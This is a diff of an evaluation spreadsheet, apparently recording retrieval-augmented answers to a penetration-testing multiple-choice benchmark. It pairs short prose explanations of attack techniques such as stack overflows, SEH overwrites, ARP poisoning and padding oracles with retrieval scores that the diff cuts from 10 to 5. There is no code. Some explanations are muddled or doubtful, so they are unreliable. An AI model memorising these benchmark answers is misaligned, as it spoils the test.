 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 093ba00d-947f-4916-ad84-551758243b8e, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I137" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J137" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K137" t="inlineStr">
         <is>
@@ -9669,7 +8968,7 @@
       <c r="F138" t="inlineStr">
         <is>
           <t>Answer: Buffer overflow in stack memory
-Explanation: A buffer overflow in stack memory occurs when more data is fed into a buffer than it is designed to hold. This discrepancy often corrupts adjacent memory, which can be exploited by attackers to execute arbitrary code, manipulate the execution flow of a program, or cause the program to crash. In contrast, SQL injection vulnerabilities and cross-site scripting attacks are primarily web application vulnerabilities that involve injecting malicious code into user inputs to manipulate database data or execute scripts in the user's browser, respectively. Misconfiguration in server settings refers to improperly configured server settings that can lead to security issues but is not directly related to buffer overflow exploitation.</t>
+Explanation: A buffer overflow in stack memory occurs when more data is fed into a buffer than it is designed to hold. This discrepancy often corrupts adjacent memory, which can be exploited by attackers to execute arbitrary code, manipulate the execution flow of a program, or cause the program to crash. In contrast, an SQL Injection vulnerability and Cross-site scripting (XSS) attack are related to handling user input in web applications, while misconfiguration in server settings refers to improper setup or configuration of a system, which can lead to various security issues but is not directly related to buffer overflow exploitation.</t>
         </is>
       </c>
       <c r="G138" t="inlineStr">
@@ -9683,21 +8982,16 @@
 preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: a6481f2a-4a32-4aab-8afe-82b2253400e6, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 2bcd487a-ccce-43e5-ac47-528e0428474b, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I138" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J138" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K138" t="inlineStr">
         <is>
@@ -9738,13 +9032,13 @@
           <t>Answer: Identifying the command and control center through network traffic
 Explanation: In the context of advanced persistent threats (APTs), identifying the command and control center
 through network traffic is the most effective technique for a cybersecurity analyst to disrupt the attacker's
-control mechanisms. This method involves monitoring network traffic to detect unusual patterns or connections
-that may indicate communication between the compromised system and the attacker's command and control
-center. By identifying this connection, the analyst can then take steps to block or disrupt the communication,
-effectively cutting off the attacker's ability to maintain control over the infected system. Reverse engineering
-the communication protocol is a complex process that may not always be feasible, static analysis tools on
-obfuscated code may not reveal all relevant information, and analyzing payload delivery via spear phishing
-focuses more on initial infection rather than ongoing control mechanisms.</t>
+control mechanisms. This method involves monitoring and analyzing network traffic to detect communication
+between compromised systems and the attacker's command and control infrastructure. By identifying this
+communication, security teams can take action to block or disrupt these connections, effectively cutting off the
+attacker's ability to control the infected systems and further infiltrate the network. While reverse engineering
+the communication protocol, using static analysis tools on obfuscated code, and analyzing payload delivery via
+spear phishing are all valuable techniques, they do not directly address disrupting the attacker's control
+mechanisms as effectively as identifying the command and control center through network traffic.</t>
         </is>
       </c>
       <c r="G139" t="inlineStr">
@@ -9758,21 +9052,16 @@
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I139" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J139" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K139" t="inlineStr">
         <is>
@@ -9811,7 +9100,7 @@
       <c r="F140" t="inlineStr">
         <is>
           <t>Answer: Remote code execution vulnerabilities
-Explanation: Remote code execution (RCE) vulnerabilities are critical security flaws that allow an attacker to execute arbitrary code on a server or other target system, typically giving the attacker the ability to perform any operation that the system allows. This could include executing commands, installing malware, or manipulating server processes. SQL injection vulnerabilities, while severe, primarily allow an attacker to manipulate a database query, which can lead to data theft, loss, or corruption, but do not inherently grant the ability to execute arbitrary server-side code unless the database server itself is misconfigured to permit this. Cross-site scripting (XSS) and Denial of Service vulnerabilities are also serious security issues, but they do not directly enable operating system command execution on the server.</t>
+Explanation: Remote code execution (RCE) vulnerabilities are critical security flaws that allow an attacker to execute arbitrary code on a server or other target system, typically giving the attacker the ability to perform any operation that the system allows. This could include executing commands, installing malware, or manipulating server processes. SQL injection vulnerabilities, while severe, primarily allow an attacker to manipulate a database query, which can lead to data theft, loss, or corruption, but do not inherently grant the ability to execute arbitrary server-side code unless the database server itself is misconfigured to permit this. Cross-site scripting (XSS) and Denial of service vulnerabilities are also serious security issues, but they do not directly enable executing arbitrary commands on the server.</t>
         </is>
       </c>
       <c r="G140" t="inlineStr">
@@ -9825,21 +9114,16 @@
 preemware_pentestingeval.pdf (Chunk: 00dd62ed-7dfa-4bd3-ad8f-e2b1cba9ce52, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 863931e2-a680-4ee8-846b-f4053787bdc1, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 11f1623f-812b-4ee5-82d3-4f85dcd656de, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 866bc2f2-6f4f-4d94-9bf5-c5a8241abd5e, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 863931e2-a680-4ee8-846b-f4053787bdc1, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I140" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J140" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K140" t="inlineStr">
         <is>
@@ -9878,7 +9162,7 @@
       <c r="F141" t="inlineStr">
         <is>
           <t>Answer: Using an SEH overwrite
-Explanation: Among the presented options, 'Using an SEH overwrite' is the most effective technique for bypassing modern security features like Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP) in Windows environments. SEH (Structured Exception Handling) overwrite involves manipulating the exception handling and recovery mechanism in Windows, which can allow an attacker to write to memory positions based on format specifiers, which are not typical for remote code execution in network services as they rely on specific application behaviors. Cross-site scripting is primarily relevant to web applications, not network services, and involves injecting scripts to be executed by web browsers.</t>
+Explanation: Among the presented options, 'Using an SEH overwrite' is the most effective technique for bypassing modern security features like Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP) in Windows environments. SEH (Structured Exception Handling) overwrite involves manipulating the exception handling and recovery mechanism in Windows, which can allow an attacker to execute arbitrary code even when ASLR and DEP are in place.</t>
         </is>
       </c>
       <c r="G141" t="inlineStr">
@@ -9892,21 +9176,16 @@
 preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: bd060a5f-5589-43ad-a132-ad7efb593ba8, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I141" t="inlineStr">
         <is>
-          <t>Semantic: 4, Keyword: 6, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J141" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K141" t="inlineStr">
         <is>
@@ -9945,7 +9224,7 @@
       <c r="F142" t="inlineStr">
         <is>
           <t>Answer: ARP poisoning
-Explanation: ARP (Address Resolution Protocol) poisoning involves sending falsified ARP messages over a local area network, which results in the linking of an attacker's MAC address with the IP address of a legitimate computer or server on the network. This allows the attacker to intercept, modify, or even stop data in transit between two legitimate hosts, essentially placing the attacker's machine in the communication path. DNS spoofing involves redirecting traffic by corrupting the domain name system resolution process, which wouldn't specifically target session IDs directly as in session fixation.</t>
+Explanation: ARP (Address Resolution Protocol) poisoning is the most appropriate choice for the described scenario. ARP poisoning involves sending falsified ARP messages over a local area network, which results in the linking of an attacker's MAC address with the IP address of a legitimate computer or server on the network. This allows the attacker to intercept, modify, or even stop data in transit between two legitimate hosts, essentially placing the attacker's machine in the communication path. DNS spoofing involves redirecting traffic by corrupting the domain name system resolution process, which wouldn't specifically target session IDs directly as in session fixation.</t>
         </is>
       </c>
       <c r="G142" t="inlineStr">
@@ -9959,21 +9238,16 @@
 preemware_pentestingeval.pdf (Chunk: 6fe9074d-23ef-4574-890d-8b4b12031dc1, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 28b5b162-5fe3-4694-ab70-f2cc135754de, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 53d92d7b-c5d1-4bbd-bdf4-b29c029a1b9e, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 076aff09-3415-41ea-8059-a0f52827a57d, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 6b3589ca-f3ff-47e3-85e1-89c85c8b6914, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I142" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J142" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K142" t="inlineStr">
         <is>
@@ -10012,7 +9286,7 @@
       <c r="F143" t="inlineStr">
         <is>
           <t>Answer: Shellcode injection via a buffer overflow
-Explanation: Shellcode injection via a buffer overflow is the most effective method among the options to exploit an application vulnerable to buffer overflows. This attack takes advantage of memory corruption issues to execute arbitrary code directly on the server, allowing the attacker to gain unauthorized access and execute arbitrary commands. SQL injection and Cross-site scripting (XSS) are powerful attacks but generally used for data exfiltration or accessing unauthorized data rather than executing commands, though in some cases they can be escalated to command execution. Cookie tampering for session hijacking is primarily used for stealing session cookies or defacing web pages rather than executing system commands on the server itself.</t>
+Explanation: Shellcode injection via a buffer overflow is most effective in this scenario because it exploits memory corruption issues to execute arbitrary code directly on the server. This allows the attacker to gain unauthorized access and elevated privileges, enabling them to execute arbitrary commands on the server. SQL injection and Cross-site scripting (XSS) are not directly related to buffer overflow vulnerabilities, while cookie tampering is more focused on session hijacking rather than executing arbitrary commands.</t>
         </is>
       </c>
       <c r="G143" t="inlineStr">
@@ -10026,21 +9300,16 @@
 preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 00dd62ed-7dfa-4bd3-ad8f-e2b1cba9ce52, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I143" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J143" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K143" t="inlineStr">
         <is>
@@ -10079,7 +9348,7 @@
       <c r="F144" t="inlineStr">
         <is>
           <t>Answer: Heap spraying combined with a use-after-free vulnerability
-Explanation: The best technique to exploit a browser vulnerability allowing for arbitrary code execution through visiting a crafted webpage is using a combination of heap spraying with a use-after-free vulnerability.</t>
+Explanation: The best technique to exploit a browser vulnerability allowing for arbitrary code execution through visiting a crafted webpage is using a combination of heap spraying with a use-after-free vulnerability. This method involves carefully manipulating the memory allocation and deallocation processes in the browser, allowing an attacker to inject their own code into the browser's memory and execute it when the vulnerable function is called. Code injection by injecting malicious scripts into input fields can be used for Cross-site Scripting (XSS) attacks but does not directly lead to arbitrary code execution on the server side. Brute force attacks are more relevant for guessing passwords, while phishing attacks aim to steal user credentials rather than exploiting browser vulnerabilities for arbitrary code execution.</t>
         </is>
       </c>
       <c r="G144" t="inlineStr">
@@ -10093,21 +9362,16 @@
 preemware_pentestingeval.pdf (Chunk: 11f1623f-812b-4ee5-82d3-4f85dcd656de, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 7b617c4a-1b3b-4481-8bf5-6d0fe80f1b8e, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 0adf643c-3c85-44a4-ab1e-397efae38e4b, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I144" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J144" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K144" t="inlineStr">
         <is>
@@ -10146,7 +9410,7 @@
       <c r="F145" t="inlineStr">
         <is>
           <t>Answer: Fuzzing the application to discover unhandled exception vulnerabilities
-Explanation: The most effective approach for identifying potential buffer overflow vulnerabilities in a software application during a penetration test is fuzzing. This technique involves sending large amounts of random data to the application with the aim of triggering a crash or unexpected behavior, which can indicate memory corruption vulnerabilities such as buffer overflows that may be exploitable. While static code analysis and port scanning are useful techniques in their own right, they do not directly target buffer overflow vulnerabilities like fuzzing does. Deploying a denial-of-service attack might test system resilience but is not specifically aimed at identifying buffer overflows.</t>
+Explanation: Fuzzing is the most effective method for identifying potential buffer overflow vulnerabilities. This technique involves sending vast amounts of random data, or 'noise', to application inputs in an attempt to crash the system. Crashes could indicate buffer overflows, which may be exploitable for executing arbitrary code. Static code analysis, while useful for finding security flaws like hard-coded credentials or insecure configurations, is less effective for dynamically identifying runtime vulnerabilities like buffer overflows that typically require execution of the affected code to be fully exposed. Port scanning and denial-of-service attacks are relevant to broader cybersecurity practices but do not directly pertain to the identification of buffer overflow vulnerabilities.</t>
         </is>
       </c>
       <c r="G145" t="inlineStr">
@@ -10160,21 +9424,16 @@
 preemware_pentestingeval.pdf (Chunk: 4803957c-c81b-46be-9e64-8d0fd54656f2, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 8d479ebf-923b-4de8-adcf-31ea07821612, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e32f0786-db66-459f-9257-ca7a63518524, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I145" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J145" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K145" t="inlineStr">
         <is>
@@ -10227,21 +9486,16 @@
 preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 4b09196a-8b79-4c16-a50f-df9b49b8c5ea, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 9aa0bfc8-f4fe-4359-bbb9-8ebb0378d387, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: sparse, Rank: 8)
-solidstate-writeup-w-o-metasploit.md (Chunk: 4e5cb313-057e-41c8-a553-db7ebf11e23b, Type: dense, Rank: 9)
-cowWhySo-pentest-redteam-steering.md (Chunk: 22ef7d6c-d646-4b82-977f-076f07d89cfd, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 9aa0bfc8-f4fe-4359-bbb9-8ebb0378d387, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I146" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J146" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K146" t="inlineStr">
         <is>
@@ -10280,7 +9534,7 @@
       <c r="F147" t="inlineStr">
         <is>
           <t>Answer: Using static analysis to identify hardcoded credentials
-Explanation: During a red team operation, the goal is often to gain initial access and intelligence about vulnerable systems without alerting network defense systems. Using static analysis to identify hardcoded credentials is an effective technique because it involves examining the code of applications to find vulnerabilities such as hardcoded passwords, which can be leveraged to gain unauthorized access to systems without triggering alerts from intrusion detection systems or security analysts. While scanning open ports with Nmap and executing SQL injections can also reveal information about vulnerable systems, they are more likely to trigger alarms due to their aggressive nature. A SYN flood attack is a denial-of-service technique that overwhelms the target system with connection requests, but it doesn't provide intelligence about vulnerabilities.</t>
+Explanation: During the initial phases of a red team operation, it's crucial to gather intelligence about vulnerable systems without alerting network defense systems. Among the options provided, using static analysis to identify hardcoded credentials is the most effective technique. This approach involves examining the code of applications to find vulnerabilities such as hardcoded passwords, which can be leveraged to gain unauthorized access to systems. Conducting a SYN flood attack, executing an SQL injection in user login forms, and scanning open ports with Nmap are all potentially detectable actions that could alert network defense systems.</t>
         </is>
       </c>
       <c r="G147" t="inlineStr">
@@ -10294,21 +9548,16 @@
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I147" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J147" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K147" t="inlineStr">
         <is>
@@ -10361,21 +9610,16 @@
 preemware_pentestingeval.pdf (Chunk: bc058460-98fa-4086-90cc-12a84379063d, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 28b5b162-5fe3-4694-ab70-f2cc135754de, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 33a81ea5-e2d4-4b7f-934e-5e7dada9648b, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 6)
-cowWhySo-pentest-redteam-steering.md (Chunk: ec4dd941-754c-41b2-b615-701f422c7cd6, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 266e5920-7591-433f-b5e2-bb81b3aa6004, Type: dense, Rank: 8)
-cowWhySo-pentest-redteam-steering.md (Chunk: 6bee50f9-4a93-48df-914c-2902a4f05b08, Type: dense, Rank: 9)
-cowWhySo-pentest-redteam-steering.md (Chunk: a5f47ca1-1ec1-4495-9397-896e37af5b85, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 33a81ea5-e2d4-4b7f-934e-5e7dada9648b, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I148" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J148" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K148" t="inlineStr">
         <is>
@@ -10414,7 +9658,7 @@
       <c r="F149" t="inlineStr">
         <is>
           <t>Answer: Padding Oracle Attack
-Explanation: A Padding Oracle Attack is the most effective in this scenario because it leverages vulnerabilities related to how padding is checked and managed during decryption in cipher block chaining (CBC) mode. It allows an attacker to decrypt data by making adaptive guesses and observing the responses to these guesses from the target system, ultimately revealing the plaintext. The bit flipping attack, although relevant to CBC mode, primarily involves manipulating encrypted data to alter the plaintext, rather than exploiting padding directly. A replay attack involves retransmitting valid data to perform unauthorized actions, and a man-in-the-middle attack involves intercepting and possibly altering communications between two parties; neither focus specifically on shortcomings in encryption padding handling, making them less suitable choices for this scenario.</t>
